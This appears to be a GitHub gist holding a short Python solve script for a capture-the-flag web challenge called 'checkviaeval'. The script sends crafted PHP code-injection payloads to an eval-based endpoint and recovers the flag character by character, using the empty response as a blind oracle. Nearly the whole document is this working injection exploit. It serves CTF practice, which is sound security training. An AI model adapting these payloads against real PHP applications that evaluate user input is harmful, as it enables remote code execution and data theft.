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Created May 30, 2018 14:30
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check via eval unintended solution
from requests import get
# - checkviaeval (web/410pt)
# made by munsiwoo
def add_length(argv) :
result = argv
e = 49 - len(argv)
for x in range(e) :
result += '/'
return result
def main() :
table = 'abcdef1234567890'
uri = ''
flag = 'flag{'
payload = "$x=flaf;$x{{3}}=g;$$x{{{}}}=='{}'?exit:1;"
get_flag = (lambda x,y:payload.format(x,y))
for x in range(len(flag), 50) :
for y in table :
response = get(uri + add_length(get_flag(x,y))).text
if(len(response) == 0) :
flag += y
print(uri + get_flag(x,y))
if(y == '0') :
print(flag + '}')
if __name__ == '__main__' :
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munsiwoo commented Sep 7, 2018


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